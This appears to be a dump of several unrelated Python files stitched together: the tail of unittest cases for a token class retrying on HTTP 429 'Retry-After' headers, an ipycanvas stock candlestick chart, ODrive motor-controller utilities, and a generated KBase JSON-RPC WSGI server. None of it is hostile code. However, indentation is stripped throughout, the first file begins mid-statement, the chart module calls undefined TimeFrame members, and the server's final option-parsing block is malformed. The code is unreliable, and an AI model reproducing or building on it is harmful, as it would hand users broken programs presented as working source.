# Not possible to have a negative integer returned in this header
])
def test_retries_on_429s_uses_retry_after_header_with_seconds_delay_if_exists(self, _, seconds_delay):
"""
Ensures that if a seconds delay is contained in the "Retry-After" header then a retry is attempted after
the appropriate amount of time.
:param _: The name of the tests
:param seconds_delay: The number of seconds to wait before retrying
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post", side_effect=[
# Return a 429 on the first attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
headers={"Retry-After": str(seconds_delay)}
),
# Return a 200 on the second attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]):
start = time()
# Ensure that we were able to get the token, if not retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
elapsed = time() - start
# Ensure that the wait was for an appropriate amount of time
self.assertEqual(int(elapsed), seconds_delay)
def test_retries_on_429s_uses_retry_after_header_with_http_date_in_future_if_exists(self):
"""
Ensures that if the HTTP Date returned on the "Retry-After" header is x seconds in the future
it takes approximately x seconds to retry and get the token.
"""
time_to_wait = 5
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post", side_effect=[
# Return a 429 on the first attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
headers={"Retry-After": self.convert_to_http_date(datetime.utcnow() + timedelta(seconds=time_to_wait))}
),
# Return a 200 on the second attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]):
start = time()
# Ensure that we were able to get the token, if not retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
elapsed = time() - start
# Ensure that the wait was for an appropriate amount of time, because the seconds to wait are calculated
# here instead of being provided directly the delay could be a second less
self.assertGreaterEqual(int(elapsed), time_to_wait - 1)
self.assertLessEqual(int(elapsed), time_to_wait)
def test_retries_on_429s_uses_retry_after_header_with_http_date_in_past_if_exists(self):
"""
Ensures that if the HTTP Date returned on the "Retry-After" header is x seconds in the past
an retry attempt to get the token is made immediately
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post", side_effect=[
# Return a 429 on the first attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
headers={"Retry-After": self.convert_to_http_date(datetime.utcnow() - timedelta(seconds=5))}
),
# Return a 200 on the second attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]):
start = time()
# Ensure that we were able to get the token, if not retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
elapsed = time() - start
# Ensure that the wait was essentially no wait before retrying
self.assertLess(elapsed, 1)
def test_can_use_id_provider_handler_to_provide_retry_after_header_from_custom_header(self):
"""
Ensures that the "Retry-After" header can be used after being created from a custom header using the
id_provider_response_handler.
"""
time_to_wait = 5
def header_creator(id_provider_response):
rate_limit_reset = id_provider_response.headers.get("X-Rate-Limit-Reset", None)
if rate_limit_reset is not None:
id_provider_response.headers["Retry-After"] = max(int(rate_limit_reset - datetime.utcnow().timestamp()), 0)
refreshing_token = RefreshingToken(api_configuration=self.config, id_provider_response_handler=header_creator)
with patch("requests.post", side_effect=[
# Return a 429 on the first attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
headers={"X-Rate-Limit-Reset": datetime.utcnow().timestamp() + time_to_wait}
),
# Return a 200 on the second attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]):
start = time()
# Ensure that we were able to get the token, if not retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
elapsed = time() - start
# Ensure that the wait was for an appropriate amount of time, because the seconds to wait are calculated
# here instead of being provided directly the delay could be a second less
self.assertGreaterEqual(int(elapsed), time_to_wait-1)
self.assertLessEqual(int(elapsed), time_to_wait)
@unittest.skip("Not valid test when using Okta caching proxy")
def test_retries_against_id_provider_after_hitting_rate_limit(self):
"""
Integration tests which calls the identity provider specified in the provided credentials (Okta in the
CI pipeline) and asserts that when the rate limit is hit a retry is made and the access token can be
successfully retrieved without throwing.
"""
responses = []
def record_response(id_provider_response):
nonlocal responses
responses.append(id_provider_response.status_code)
# Create 5 independent tokens
refreshing_token1 = RefreshingToken(api_configuration=self.config, id_provider_response_handler=record_response)
refreshing_token2 = RefreshingToken(api_configuration=self.config, id_provider_response_handler=record_response)
refreshing_token3 = RefreshingToken(api_configuration=self.config, id_provider_response_handler=record_response)
refreshing_token4 = RefreshingToken(api_configuration=self.config, id_provider_response_handler=record_response)
refreshing_token5 = RefreshingToken(api_configuration=self.config, id_provider_response_handler=record_response)
# Get the access token from each one on an independent thread
thread1 = Thread(target=self.force_refresh, args=[refreshing_token1])
thread2 = Thread(target=self.force_refresh, args=[refreshing_token2])
thread3 = Thread(target=self.force_refresh, args=[refreshing_token3])
thread4 = Thread(target=self.force_refresh, args=[refreshing_token4])
thread5 = Thread(target=self.force_refresh, args=[refreshing_token5])
# Run all threads
thread1.start()
thread2.start()
thread3.start()
thread4.start()
thread5.start()
thread1.join()
thread2.join()
thread3.join()
thread4.join()
thread5.join()
# Count the status codes returned
result = dict((i, responses.count(i)) for i in responses)
# Expect to see at least a single 429
self.assertGreaterEqual(result[429], 1)
# And 5 200s eventually
self.assertEqual(result[200], 5)
|
stock_chart_canvas.py
|
from typing import Iterable, Tuple
from ipycanvas import Canvas
from datetime import date, datetime, time, timedelta, timezone
from ipycanvas.canvas import hold_canvas
from ipycanvas import Canvas
from threading import Event, Thread
from traitlets.traitlets import Enum
def draw_ticker(ticker, canvas):
pass
class TimeFrame(Enum):
MINUTES_5 = 5 * 60 * 1000
HOURS = 60 * 60 * 1000
DAYS = 24 * HOURS
MONTHS = 30 * DAYS
def choose_time_frame(delta_time_ms: float) -> TimeFrame:
time_frames = [TimeFrame.MS, TimeFrame.SECONDS, TimeFrame.MINUTES, TimeFrame.HOURS, TimeFrame.DAYS, TimeFrame.WEEK, TimeFrame.MONTH]
time_frames_gt_10 = filter(lambda x: delta_time_ms / x > 10, time_frames)
return max(time_frames_gt_10)
def consolidate(stocks: Iterable[Tuple[datetime, float, float, float, float]]) -> Tuple[datetime, float, float, float, float]:
first_date = None
first_open = None
last_close = None
min_low = None
max_high = None
for (timestamp, open, high, low, close) in stocks:
if first_date == None:
first_date = timestamp
if first_open == None:
first_open = open
last_close = close
if min_low == None or min_low > low:
min_low = low
if max_high == None or max_high < high:
max_high = high
return (first_date, first_open, max_high, min_low, last_close)
def draw_stocks(data: Iterable[Tuple[datetime, float, float, float, float]], canvas: Canvas, min_x: datetime, min_y: float, max_y: float):
CANDLE_STICK_WIDTH_PX = 20
max_x = min_x + timedelta(minutes=5) * (canvas.width / CANDLE_STICK_WIDTH_PX)
for (timestamp, open, high, low, close) in data:
if min_x > timestamp or timestamp > max_x:
continue
time_range_ms = (max_x.timestamp() - min_x.timestamp())
time_off_of_cur = (timestamp.timestamp() - min_x.timestamp())
x1 = (time_off_of_cur / time_range_ms) * canvas.width
# TODO: Update this later
# \/ Assumes it a 5min chart
x2 = ((time_off_of_cur + 5 * 60) / time_range_ms) * canvas.width
width = x2 - x1
y_low = canvas.height - ((low - min_y) / (max_y - min_y)) * canvas.height
y_high = canvas.height - ((high - min_y) / (max_y - min_y)) * canvas.height
y_open = canvas.height - ((open - min_y) / (max_y - min_y)) * canvas.height
y_close = canvas.height - ((close - min_y) / (max_y - min_y)) * canvas.height
canvas.fill_style = 'green';
canvas.stroke_style = 'green'
height = abs(y_close - y_open)
top = y_close
if open > close:
canvas.fill_style = 'red'
canvas.stroke_style = 'red'
canvas.stroke_line((x1 + x2) / 2, y_high, (x1 + x2) / 2, y_low)
canvas.fill_rect(x1 + width / 10, top, width - (width / 5), height)
class StockChartCanvas:
def __init__(self, canvas: Canvas, data):
self.data = data
self.canvas = canvas
self.mouse_down = False
self.x_offset = data[0][0]
self.y_offset = 0
self.prev_pos = (0, 0)
self.canvas.on_client_ready(lambda: self.redraw)
self.canvas.on_mouse_down(lambda x, y: self._mouse_down(x, y))
self.canvas.on_mouse_up(lambda x, y: self._mouse_up(x, y))
self.canvas.on_mouse_move(lambda x, y: self._mouse_move(x, y))
self.canvas.on_mouse_out(lambda x, y: self._mouse_out(x, y))
self.stopped = Event()
self.event_loop = Thread(target=lambda: self._update())
pass
def start(self):
self.event_loop.start()
def stop(self):
self.stopped.set()
self.event_loop.join()
def _update(self):
while not self.stopped.wait(1/60):
self.redraw()
def redraw(self):
with hold_canvas(self.canvas):
self.canvas.clear()
draw_stocks(self.data, self.canvas, self.x_offset, self.y_offset + 135, self.y_offset + 140)
def _mouse_down(self, x, y):
self.mouse_down = True
def _mouse_up(self, x, y):
self.mouse_down = False
def _mouse_out(self, x, y):
self.mouse_down = False
def _mouse_move(self, x, y):
if self.mouse_down:
self.x_offset = self.x_offset + timedelta(minutes=(x - self.prev_pos[0]))
self.y_offset = self.y_offset + (y - self.prev_pos[1]) / 100
self.prev_pos = (x, y)
|
utils.py
|
from __future__ import print_function
import sys
import time
import threading
import platform
import subprocess
import os
from fibre.utils import Event
from odrive.enums import errors
try:
if platform.system() == 'Windows':
import win32console
import colorama
colorama.init()
except ImportError:
print("Could not init terminal features.")
print("Refer to install instructions at http://docs.odriverobotics.com/#downloading-and-installing-tools")
sys.stdout.flush()
pass
_VT100Colors = {
'green': '\x1b[92;1m',
'cyan': '\x1b[96;1m',
'yellow': '\x1b[93;1m',
'red': '\x1b[91;1m',
'default': '\x1b[0m'
}
class OperationAbortedException(Exception):
pass
def dump_errors(odrv, clear=False):
axes = [(name, axis) for name, axis in odrv._remote_attributes.items() if 'axis' in name]
axes.sort()
for name, axis in axes:
print(name)
# Flatten axis and submodules
# (name, remote_obj, errorcode)
module_decode_map = [
('axis', axis, errors.axis),
('motor', axis.motor, errors.motor),
('encoder', axis.encoder, errors.encoder),
('controller', axis.controller, errors.controller),
]
# Module error decode
for name, remote_obj, errorcodes in module_decode_map:
prefix = ' '*2 + name + ": "
if (remote_obj.error != errorcodes.ERROR_NONE):
print(prefix + _VT100Colors['red'] + "Error(s):" + _VT100Colors['default'])
errorcodes_tup = [(name, val) for name, val in errorcodes.__dict__.items() if 'ERROR_' in name]
for codename, codeval in errorcodes_tup:
if remote_obj.error & codeval != 0:
print(" " + codename)
if clear:
remote_obj.error = errorcodes.ERROR_NONE
else:
print(prefix + _VT100Colors['green'] + "no error" + _VT100Colors['default'])
data_rate = 100
plot_rate = 10
num_samples = 1000
def start_liveplotter(get_var_callback):
"""
Starts a liveplotter.
The variable that is plotted is retrieved from get_var_callback.
This function returns immediately and the liveplotter quits when
the user closes it.
"""
import matplotlib.pyplot as plt
cancellation_token = Event()
global vals
vals = []
def fetch_data():
global vals
while not cancellation_token.is_set():
try:
data = get_var_callback()
except Exception as ex:
print(str(ex))
time.sleep(1)
continue
vals.append(data)
if len(vals) > num_samples:
vals = vals[-num_samples:]
time.sleep(1/data_rate)
# TODO: use animation for better UI performance, see:
# https://matplotlib.org/examples/animation/simple_anim.html
def plot_data():
global vals
plt.ion()
# Make sure the script terminates when the user closes the plotter
def did_close(evt):
cancellation_token.set()
fig = plt.figure()
fig.canvas.mpl_connect('close_event', did_close)
while not cancellation_token.is_set():
plt.clf()
plt.plot(vals)
plt.legend(list(range(len(vals))))
fig.canvas.draw()
fig.canvas.start_event_loop(1/plot_rate)
fetch_t = threading.Thread(target=fetch_data)
fetch_t.daemon = True
fetch_t.start()
plot_t = threading.Thread(target=plot_data)
plot_t.daemon = True
plot_t.start()
return cancellation_token;
#plot_data()
def print_drv_regs(name, motor):
"""
Dumps the current gate driver regisers for the specified motor
"""
fault = motor.gate_driver.drv_fault
status_reg_1 = motor.gate_driver.status_reg_1
status_reg_2 = motor.gate_driver.status_reg_2
ctrl_reg_1 = motor.gate_driver.ctrl_reg_1
ctrl_reg_2 = motor.gate_driver.ctrl_reg_2
print(name + ": " + str(fault))
print("DRV Fault Code: " + str(fault))
print("Status Reg 1: " + str(status_reg_1) + " (" + format(status_reg_1, '#010b') + ")")
print("Status Reg 2: " + str(status_reg_2) + " (" + format(status_reg_2, '#010b') + ")")
print("Control Reg 1: " + str(ctrl_reg_1) + " (" + format(ctrl_reg_1, '#013b') + ")")
print("Control Reg 2: " + str(ctrl_reg_2) + " (" + format(ctrl_reg_2, '#09b') + ")")
def show_oscilloscope(odrv):
size = 18000
values = []
for i in range(size):
values.append(odrv.get_oscilloscope_val(i))
import matplotlib.pyplot as plt
plt.plot(values)
plt.show()
def rate_test(device):
"""
Tests how many integers per second can be transmitted
"""
# import matplotlib.pyplot as plt
# plt.ion()
print("reading 10000 values...")
numFrames = 10000
vals = []
for _ in range(numFrames):
vals.append(device.axis0.loop_counter)
loopsPerFrame = (vals[-1] - vals[0])/numFrames
loopsPerSec = (168000000/(2*10192))
FramePerSec = loopsPerSec/loopsPerFrame
print("Frames per second: " + str(FramePerSec))
# plt.plot(vals)
# plt.show(block=True)
def usb_burn_in_test(get_var_callback, cancellation_token):
"""
Starts background threads that read a values form the USB device in a spin-loop
"""
def fetch_data():
global vals
i = 0
while not cancellation_token.is_set():
try:
get_var_callback()
i += 1
except Exception as ex:
print(str(ex))
time.sleep(1)
i = 0
continue
if i % 1000 == 0:
print("read {} values".format(i))
threading.Thread(target=fetch_data, daemon=True).start()
def yes_no_prompt(question, default=None):
if default is None:
question += " [y/n] "
elif default == True:
question += " [Y/n] "
elif default == False:
question += " [y/N] "
while True:
print(question, end='')
choice = input().lower()
if choice in {'yes', 'y'}:
return True
elif choice in {'no', 'n'}:
return False
elif choice == '' and default is not None:
return default
|
MiscIndexerServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
import log
from MiscIndexer.authclient import KBaseAuth as _KBaseAuth
try:
from configparser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'MiscIndexer'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from MiscIndexer.MiscIndexerImpl import MiscIndexer # noqa @IgnorePep8
impl_MiscIndexer = MiscIndexer(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'MiscIndexer'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_MiscIndexer.assembly_index,
name='MiscIndexer.assembly_index',
types=[dict])
self.method_authentication['MiscIndexer.assembly_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.assemblycontig_index,
name='MiscIndexer.assemblycontig_index',
types=[dict])
self.method_authentication['MiscIndexer.assemblycontig_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.narrative_index,
name='MiscIndexer.narrative_index',
types=[dict])
self.method_authentication['MiscIndexer.narrative_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.ontologyterm_index,
name='MiscIndexer.ontologyterm_index',
types=[dict])
self.method_authentication['MiscIndexer.ontologyterm_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.pairedendlibrary_index,
name='MiscIndexer.pairedendlibrary_index',
types=[dict])
self.method_authentication['MiscIndexer.pairedendlibrary_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.pangenome_index,
name='MiscIndexer.pangenome_index',
types=[dict])
self.method_authentication['MiscIndexer.pangenome_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.pangenomeorthology_index,
name='MiscIndexer.pangenomeorthology_index',
types=[dict])
self.method_authentication['MiscIndexer.pangenomeorthology_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.rnaseqsampleset_index,
name='MiscIndexer.rnaseqsampleset_index',
types=[dict])
self.method_authentication['MiscIndexer.rnaseqsampleset_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.singleendlibrary_index,
name='MiscIndexer.singleendlibrary_index',
types=[dict])
self.method_authentication['MiscIndexer.singleendlibrary_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.taxon_index,
name='MiscIndexer.taxon_index',
types=[dict])
self.method_authentication['MiscIndexer.taxon_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.tree_index,
name='MiscIndexer.tree_index',
types=[dict])
self.method_authentication['MiscIndexer.tree_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.status,
name='MiscIndexer.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'MiscIndexer ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
